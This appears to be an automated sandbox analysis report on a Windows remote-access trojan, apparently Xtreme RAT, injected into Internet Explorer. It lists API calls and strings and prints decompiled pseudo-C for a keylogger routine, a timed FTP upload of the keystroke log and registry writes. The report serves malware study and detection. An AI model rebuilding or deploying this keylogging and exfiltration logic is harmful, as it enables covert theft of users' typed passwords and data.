0x00c843bb
0x00c843d4
0x00c843df
0x00c843ed
0x00c843fb
0x00c843fc
0x00c843fc
0x00c843bb
0x00c84373
0x00c84380
0x00c8438b
0x00c84399
0x00c843a7
0x00c843a8
0x00c843a8
0x00c8432f
0x00c8433c
0x00c84347
0x00c84355
0x00c84363
0x00c84364
0x00c84364
0x00c842eb
0x00c842f8
0x00c84303
0x00c84304
0x00c84311
0x00c8431f
0x00c84320
0x00c84320
0x00c842a7
0x00c842b4
0x00c842bf
0x00c842cd
0x00c842db
0x00c842dc
0x00c842dc
0x00c84413
0x00c8442d
0x00c8442f
0x00c84482
0x00c84485
0x00c84496
0x00c84431
0x00c84448
0x00c84453
0x00c84461
0x00c8446f
0x00c84470
0x00c84470
0x00c8449e
0x00c844a5
0x00c844a6
0x00c844a7
0x00c844b0
0x00c844b9
0x00c844bd
0x00c844be
0x00c844c3
0x00c844c9
0x00c844cc
0x00c844ce
0x00c844d1
0x00c844e8
0x00c844ea
0x00c844fa
0x00c844fa
0x00c844d3
0x00c844e1
0x00c844e1
0x00c844d1
0x00000000
0x00c844cc
0x00c84212
0x00c8421a
0x00c84233
0x00c8423e
0x00c8424c
0x00c8425c
0x00c8425d
0x00c8426d
0x00c84272
0x00000000
0x00c84278
0x00c84298
0x00000000
0x00c84298
0x00c84272
0x00000000
0x00c844ff
0x00c84100
0x00c84100
0x00c84102
0x00c84104
0x00c84105
0x00000000
0x00c84107
0x00c84107
0x00c8410b
0x00c84118
0x00c84118
0x00c8411a
0x00c84122
0x00c84123
0x00c84128
0x00c8412b
0x00c84131
0x00c8413b
0x00c84140
0x00c8414c
0x00c84150
0x00c8415a
0x00c8415b
0x00c8415b
0x00000000
0x00c84140

APIs

Part of subcall function 00C8406C: FindResourceW.KERNEL32(00C80000,XTREMEBINDER,0000000A), ref: 00C84086
Part of subcall function 00C8406C: SizeofResource.KERNEL32(00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A,?,00000000,00000001,00000000), ref: 00C84094
Part of subcall function 00C8406C: LoadResource.KERNEL32(00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A,?,00000000), ref: 00C840A2
Part of subcall function 00C8406C: LockResource.KERNEL32(00000000,00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A), ref: 00C840AA
Part of subcall function 00C8406C: FreeResource.KERNEL32(00000000,00000000,00C80000,00000000,00C80000,00000000,00C80000,XTREMEBINDER,0000000A,?,?,00C8E07C,?,00C84136,00000000,00C8453A), ref: 00C840D1

Part of subcall function 00C81B78: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86

DeleteFileW.KERNEL32(00000000,00000004,00000000,00000002,00000000,00000002,00000000,?,00000000,00C8453A,?,00000000,00000001,00000000,00000351,00000000), ref: 00C84496

Part of subcall function 00C83008: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00C83018

Part of subcall function 00C82E70: RegOpenKeyExW.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C,?), ref: 00C82EC5
Part of subcall function 00C82E70: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C,?), ref: 00C82EE9
Part of subcall function 00C82E70: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 00C82F1A
Part of subcall function 00C82E70: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00C82F77,?,00C8E07C), ref: 00C82F23

Part of subcall function 00C82F90: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
Part of subcall function 00C82F90: RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C82FBF
Part of subcall function 00C82F90: RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C82FCE

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00C844E1

Part of subcall function 00C83060: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,svchost.exe,00000000,00C8498E,00000000,00C84B74,?,00C8E07C,00000000,00000000), ref: 00C83077

Part of subcall function 00C83034: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00C83044

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00C844FA

Part of subcall function 00C82FE0: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C849F0,00000000,00C84B74,?,00C8E07C,00000000,00000000), ref: 00C82FEF
Part of subcall function 00C82FE0: GetTempPathW.KERNEL32(00000104,00000000), ref: 00C82FFC

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

open, xrefs: 00C844DA, 00C844F3
.exe, xrefs: 00C8440B
.xtr, xrefs: 00C8447D
SOFTWARE\, xrefs: 00C84221, 00C84285
BINDER, xrefs: 00C84155

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C85568, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 172
keyboard

C-Code - Quality: 98%

			E00C85568(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi, intOrPtr* _a4, struct HKL__* _a8) {
				signed int _v6;
				signed int _v8;
				char _v9;
				void _v265;
				char _v524;
				int _v528;
				void _v532;
				short _v788;
				char _v1044;
				char _v1048;
				char _v1052;
				void* _t41;
				void* _t48;
				int _t73;
				int _t77;
				int _t102;
				signed int _t113;
				intOrPtr _t115;
				intOrPtr* _t136;
				int _t145;
				int _t147;
				void* _t152;

				_t113 = __edx;
				_v1052 = 0;
				_v1048 = 0;
				_t41 = memcpy( &_v265, __ecx, 0x40 << 2);
				_v8 = _t113;
				_v6 = _t41;
				_t136 = _a4;
				_push(_t152);
				_push(0xc85fbf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t152 + 0xfffffffffffffbf4;
				E00C81B78(_t136);
				_t102 = 0;
				E00C8291C();
				_t48 = (_v6 & 0x0000ffff) + 0xfffffff8;
				if(_t48 <= 0xf3) {
					switch( *((intOrPtr*)( *(_t48 + E00C855E2) * 4 +  &M00C856D6))) {
						case 0:
							goto L90;
						case 1:
							E00C81BB4(_t136, L"[Numpad +]");
							goto L90;
						case 2:
							__eax = __edi;
							__edx = L"[Backspace]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 3:
							__eax = __edi;
							__edx = L"[Numpad .]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 4:
							__eax = __edi;
							__edx = L"[Numpad /]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 5:
							__eax = __edi;
							__edx = L"[Esc]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 6:
							__eax = __edi;
							__edx = L"[Execute]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 7:
							__eax = __edi;
							__edx = L"[Numpad *]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 8:
							__eax = __edi;
							__edx = 0xc86088;
							__eax = E00C81BB4(__edi, 0xc86088);
							goto L90;
						case 9:
							__eax = __edi;
							__edx = 0xc86090;
							__eax = E00C81BB4(__edi, 0xc86090);
							goto L90;
						case 0xa:
							__eax = __edi;
							__edx = 0xc86098;
							__eax = E00C81BB4(__edi, 0xc86098);
							goto L90;
						case 0xb:
							__eax = __edi;
							__edx = 0xc860a0;
							__eax = E00C81BB4(__edi, 0xc860a0);
							goto L90;
						case 0xc:
							__eax = __edi;
							__edx = 0xc860a8;
							__eax = E00C81BB4(__edi, 0xc860a8);
							goto L90;
						case 0xd:
							__eax = __edi;
							__edx = 0xc860b0;
							__eax = E00C81BB4(__edi, 0xc860b0);
							goto L90;
						case 0xe:
							__eax = __edi;
							__edx = 0xc860b8;
							__eax = E00C81BB4(__edi, 0xc860b8);
							goto L90;
						case 0xf:
							__eax = __edi;
							__edx = 0xc860c0;
							__eax = E00C81BB4(__edi, 0xc860c0);
							goto L90;
						case 0x10:
							__eax = __edi;
							__edx = 0xc860c8;
							__eax = E00C81BB4(__edi, 0xc860c8);
							goto L90;
						case 0x11:
							__eax = __edi;
							__edx = 0xc860d0;
							__eax = E00C81BB4(__edi, 0xc860d0);
							goto L90;
						case 0x12:
							__eax = __edi;
							__edx = L"[Back Tab]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x13:
							__eax = __edi;
							__edx = L"[Copy]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x14:
							__eax = __edi;
							__edx = L"[Finish]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x15:
							__eax = __edi;
							__edx = L"[Reset]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x16:
							__eax = __edi;
							__edx = L"[Play]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x17:
							__eax = __edi;
							__edx = L"[Process]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x18:
							__eax = __edi;
							__edx = 0xc86160;
							__eax = E00C81BB4(__edi, 0xc86160);
							goto L90;
						case 0x19:
							__eax = __edi;
							__edx = L"[Select]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x1a:
							__eax = __edi;
							__edx = L"[Separator]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x1b:
							__eax = __edi;
							__edx = 0xc861a0;
							__eax = E00C81BB4(__edi, 0xc861a0);
							goto L90;
						case 0x1c:
							__eax = __edi;
							__edx = L"[Numpad -]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x1d:
							__eax = __edi;
							__edx = L"[Tab]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x1e:
							__eax = __edi;
							__edx = L"[Zoom]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x1f:
							__eax = __edi;
							__edx = L"[Accept]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x20:
							__eax = __edi;
							__edx = L"[Context Menu]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x21:
							__eax = __edi;
							__edx = L"[Caps Lock]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x22:
							__eax = __edi;
							__edx = L"[Delete]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x23:
							__eax = __edi;
							__edx = L"[Arrow Down]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x24:
							__eax = __edi;
							__edx = L"[End]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x25:
							__eax = __edi;
							__edx = L"[F1]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x26:
							__eax = __edi;
							__edx = L"[F10]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x27:
							__eax = __edi;
							__edx = L"[F11]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x28:
							__eax = __edi;
							__edx = L"[F12]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x29:
							__eax = __edi;
							__edx = L"[F13]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2a:
							__eax = __edi;
							__edx = L"[F14]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2b:
							__eax = __edi;
							__edx = L"[F15]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2c:
							__eax = __edi;
							__edx = L"[F16]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2d:
							__eax = __edi;
							__edx = L"[F17]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2e:
							__eax = __edi;
							__edx = L"[F18]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x2f:
							__eax = __edi;
							__edx = L"[F19]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x30:
							__eax = __edi;
							__edx = L"[F2]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x31:
							__eax = __edi;
							__edx = L"[F20]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x32:
							__eax = __edi;
							__edx = L"[F21]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x33:
							__eax = __edi;
							__edx = L"[F22]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x34:
							__eax = __edi;
							__edx = L"[F23]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x35:
							__eax = __edi;
							__edx = L"[F24]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x36:
							__eax = __edi;
							__edx = L"[F3]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x37:
							__eax = __edi;
							__edx = L"[F4]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x38:
							__eax = __edi;
							__edx = L"[F5]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x39:
							__eax = __edi;
							__edx = L"[F6]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3a:
							__eax = __edi;
							__edx = L"[F7]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3b:
							__eax = __edi;
							__edx = L"[F8]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3c:
							__eax = __edi;
							__edx = L"[F9]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3d:
							__eax = __edi;
							__edx = L"[Help]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3e:
							__eax = __edi;
							__edx = L"[Home]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x3f:
							__eax = __edi;
							__edx = L"[Insert]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x40:
							__eax = __edi;
							__edx = L"[Mail]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x41:
							__eax = __edi;
							__edx = L"[Media]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x42:
							__eax = __edi;
							__edx = L"[Left Ctrl]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x43:
							__eax = __edi;
							__edx = L"[Arrow Left]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x44:
							__eax = __edi;
							__edx = L"[Left Alt]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x45:
							__eax = __edi;
							__edx = L"[Next Track]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x46:
							__eax = __edi;
							__edx = L"[Play / Pause]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x47:
							__eax = __edi;
							__edx = L"[Previous Track]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x48:
							__eax = __edi;
							__edx = L"[Stop]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x49:
							__eax = __edi;
							__edx = L"[Mode Change]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4a:
							__eax = __edi;
							__edx = L"[Page Down]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4b:
							__eax = __edi;
							__edx = L"[Num Lock]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4c:
							__eax = __edi;
							__edx = L"[Pause]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4d:
							__eax = __edi;
							__edx = L"[Print]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4e:
							__eax = __edi;
							__edx = L"[Page Up]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x4f:
							__eax = __edi;
							__edx = L"[Right Ctrl]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x50:
							__eax = __edi;
							__edx = L"[Arrow Right]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x51:
							__eax = __edi;
							__edx = L"[Right Alt]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x52:
							__eax = __edi;
							__edx = L"[Scrol Lock]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x53:
							__eax = __edi;
							__edx = L"[Sleep]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x54:
							__eax = __edi;
							__edx = L"[Print Screen]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x55:
							__eax = __edi;
							__edx = L"[Arrow Up]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x56:
							__eax = __edi;
							__edx = L"[Volume Down]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x57:
							__eax = __edi;
							__edx = L"[Volume Mute]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
						case 0x58:
							__eax = __edi;
							__edx = L"[Volume Up]";
							__eax = E00C81BB4(__edi, __edx);
							goto L90;
					}
				}
				L90:
				if(E00C81D04( *_t136) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *_t136) > 0 && E00C81F1C(L"Numpad",  *_t136) <= 0) {
					_t102 = 1;
					E00C81BB4(_t136, L"KeyDelBackspace");
				}
				_v9 = E00C854EC();
				_t145 = ToUnicodeEx(_v6 & 0x0000ffff, _v8 & 0x0000ffff,  &_v265,  &_v788, 0x100, 0, _a8);
				if(_t145 <= 0) {
					__eflags = _t145;
					if(_t145 < 0) {
						 *0xc8deec = _v6 & 0x0000ffff;
						 *0xc8def0 = _v8 & 0x0000ffff;
						memcpy(0xc8def4,  &_v265, 0x40 << 2);
						_t136 = _t136;
						_t147 = _t145;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t147;
						if(_t147 < 0) {
							do {
								_t73 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1),  &_v1044,  &_v788, 0x100, 0, _a8);
								__eflags = _t73;
							} while (_t73 < 0);
						}
					}
				} else {
					memcpy( &_v532, 0xc8deec, 0x42 << 2);
					_t136 = _t136;
					if(E00C81D04( *_t136) == 0) {
						E00C81CD8(_t136, 0x80,  &_v788);
						_t164 = _v9;
						if(_v9 != 0) {
							E00C85148( *_t136, _t102, 0x80,  &_v1052, _t136, 0xc8deec, __eflags);
							E00C81BB4(_t136, _v1052);
						} else {
							E00C850CC( *_t136, _t102, 0x80,  &_v1048, _t136, 0xc8deec, _t164);
							E00C81BB4(_t136, _v1048);
						}
					}
					_t77 = _v532;
					if(_t77 != 0) {
						ToUnicodeEx(_t77, _v528,  &_v524,  &_v788, 0x100, 0, _a8);
					}
					E00C8291C();
				}
				if(_t102 == 1) {
					E00C81B78(_t136);
				}
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E00C85FC6);
				return E00C81B90( &_v1052, 2);
			}

APIs

Part of subcall function 00C81B78: 75CF4513.OLEAUT32(00C89A90,00C89B88,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81B86

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: 75CF465A.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C77
Part of subcall function 00C81CD8: 75CF4513.OLEAUT32(00000000,00000000,?,00C89C29,00000064,00008007,00000000,00C8A62B), ref: 00C81C89

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C81BB4: 75CF7790.OLEAUT32(00C89B88,00C89A90,00000014,00C81629,?,?,00C89BFC,00000000,00C8A62B), ref: 00C81BCA

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: 75CF4513.OLEAUT32(?,00C8E07C,?,00C8452C,00C84541,00000000,00000001,00000000,00000351,00000000,00000000,?,00C8A5BE,00000000,00000000,00000000), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C87614, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 75
filesleep

C-Code - Quality: 100%

			E00C87614() {
				char _v516;
				intOrPtr _t8;
				intOrPtr _t19;
				void* _t23;
				void* _t25;
				short* _t29;
				void* _t30;
				short _t32;
				void* _t35;
				void* _t38;
				void* _t39;

				while(1) {
					_t30 = 0;
					do {
						L2:
						Sleep(0x3e8);
						_t30 = _t30 + 1;
						_t8 =  *0xc8db94; // 0x0
					} while (_t30 < (_t8 + 1 + (_t8 + 1) * 4) * 0x3c);
					L3:
					if( *0xc8dee8 == 0) {
						do {
							_t30 = 0;
							goto L2;
						} while ( *0xc8dee8 == 0);
					}
					E00C8291C();
					E00C86890( &_v516);
					_t35 = E00C82E48( &_v516) - 1;
					if(_t35 < 0) {
						L13:
						_t19 =  *0xc8dec8; // 0x460000
						if(E00C873E0(0xc8da4c, E00C833A8(_t19, 0xc8773c, _t46), 0xc8da9e, ?str?, ?str?,  &_v516) != 0 &&  *0xc8db98 == 1 &&  *0xc8da4b == 1) {
							_t23 =  *0xc8dee8; // 0xd0
							SetFilePointer(_t23, 0, 0, 0);
							_t25 =  *0xc8dee8; // 0xd0
							SetEndOfFile(_t25);
							 *0xc8b0c8 = 0;
							 *0xc8b0cc = 0;
							E00C853EC(0, _t30, _t39);
						}
						continue;
					} else {
						_t38 = _t35 + 1;
						_t29 =  &_v516;
						do {
							_t32 =  *_t29;
							if(_t32 != 0x3a) {
								__eflags = _t32 - 0x2f;
								if(__eflags != 0) {
									__eflags = _t32 - 0x20;
									if(__eflags == 0) {
										 *_t29 = 0x2d;
									}
								} else {
									 *_t29 = 0x2e;
								}
							} else {
								 *_t29 = 0x2e;
							}
							_t29 = _t29 + 2;
							_t38 = _t38 - 1;
							_t46 = _t38;
						} while (_t38 != 0);
						goto L13;
					}
				}
			}

APIs

Sleep.KERNEL32(000003E8), ref: 00C87625

Part of subcall function 00C86890: GetLocalTime.KERNEL32 ref: 00C86897
Part of subcall function 00C86890: GetDateFormatW.KERNEL32(00000800,00000001,?,00000000,?,000000FF), ref: 00C868B0
Part of subcall function 00C86890: GetTimeFormatW.KERNEL32(00000800,00000008,?,00000000,00000000,000000FF), ref: 00C868E0

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C873E0: GetFileSize.KERNEL32(000000D0,00000000), ref: 00C87417
Part of subcall function 00C873E0: SendMessageA.USER32(00100164,0000C1F2,00000000,00000000), ref: 00C874D7
Part of subcall function 00C873E0: SetFilePointer.KERNEL32(000000D0,00000000,00000000,00000000,00100164,0000C1F2,00000000,00000000,000000D0,00000000), ref: 00C874EC
Part of subcall function 00C873E0: VirtualAlloc.KERNEL32(00000000,-00C8B0C8,00001000,00000004,000000D0,00000000,00000000,00000000,00100164,0000C1F2,00000000,00000000,000000D0,00000000), ref: 00C87506
Part of subcall function 00C873E0: ReadFile.KERNEL32(000000D0,?,-00C8B0C8,?,00000000), ref: 00C87525
Part of subcall function 00C873E0: SetFilePointer.KERNEL32(000000D0,00000000,00000000,00000002,000000D0,?,-00C8B0C8,?,00000000,00000000,-00C8B0C8,00001000,00000004,000000D0,00000000,00000000), ref: 00C87536
Part of subcall function 00C873E0: SendMessageA.USER32(00100164,0000C1F3,00000000,00000000), ref: 00C8754B
Part of subcall function 00C873E0: SetFileAttributesW.KERNEL32(?,00000080,00100164,0000C1F3,00000000,00000000,000000D0,00000000,00000000,00000002,000000D0,?,-00C8B0C8,?,00000000,00000000), ref: 00C87556
Part of subcall function 00C873E0: DeleteFileW.KERNEL32(?,?,00000080,00100164,0000C1F3,00000000,00000000,000000D0,00000000,00000000,00000002,000000D0,?,-00C8B0C8,?,00000000), ref: 00C8755C
Part of subcall function 00C873E0: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00C87571
Part of subcall function 00C873E0: WriteFile.KERNEL32(00000000,000000FF,00000002,?,00000000), ref: 00C87592
Part of subcall function 00C873E0: VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,00000000,000000FF,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000000), ref: 00C875BB
Part of subcall function 00C873E0: CloseHandle.KERNEL32(00000000), ref: 00C875C1
Part of subcall function 00C873E0: DeleteFileW.KERNEL32(?,?,?,?,00000000,?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,00000080,00100164), ref: 00C87602

SetFilePointer.KERNEL32(000000D0,00000000,00000000,00000000,ftppass,ftpuser,?,000003E8), ref: 00C87705
SetEndOfFile.KERNEL32(000000D0,000000D0,00000000,00000000,00000000,ftppass,ftpuser,?,000003E8), ref: 00C87710

Part of subcall function 00C853EC: RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4,?,SOFTWARE\,00000000,00C854AA,?,?), ref: 00C8545A
Part of subcall function 00C853EC: RegSetValueExW.ADVAPI32(?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000,00C854D4), ref: 00C85481
Part of subcall function 00C853EC: RegCloseKey.ADVAPI32(?,?,LastSize,00000000,00000004,?,00000004,80000001,00000000,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00C8548A

Strings

FTP, xrefs: 00C876B7
ftpuser, xrefs: 00C876AD
ftppass, xrefs: 00C876B2
ftp.ftpserver.com, xrefs: 00C876CD

Memory Dump Source

Source File: 00000006.00000002.14955870384.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_c80000_iexplore.jbxd

Yara matches

Function 00C853EC, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 65
registry

C-Code - Quality: 50%

			E00C853EC(char __eax, void* __ebx, void* __esi) {
				void* _v8;
				char _v12;
				int* _v16;
				char _v20;
				intOrPtr _t39;
				char _t43;
				void* _t46;

				_v20 = 0;
				_v16 = 0;
				_t43 = __eax;
				_push(_t46);
				_push(0xc854aa);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff0;
				_push(L"SOFTWARE\\");
				E00C81CD8( &_v20, 0xb, 0xc8d9bc);
				_push(_v20);
				_push(E00C854D4);
				E00C81D74();
				if(RegCreateKeyExW(0x80000001, E00C81CF4(_v16), 0, 0, 0, 0x20006, 0,  &_v8, 0) == 0) {
					_v12 = _t43;
					RegSetValueExW(_v8, L"LastSize", 0, 4,  &_v12, 4);
					RegCloseKey(_v8);
				}
				_pop(_t39);
				 *[fs:eax] = _t39;
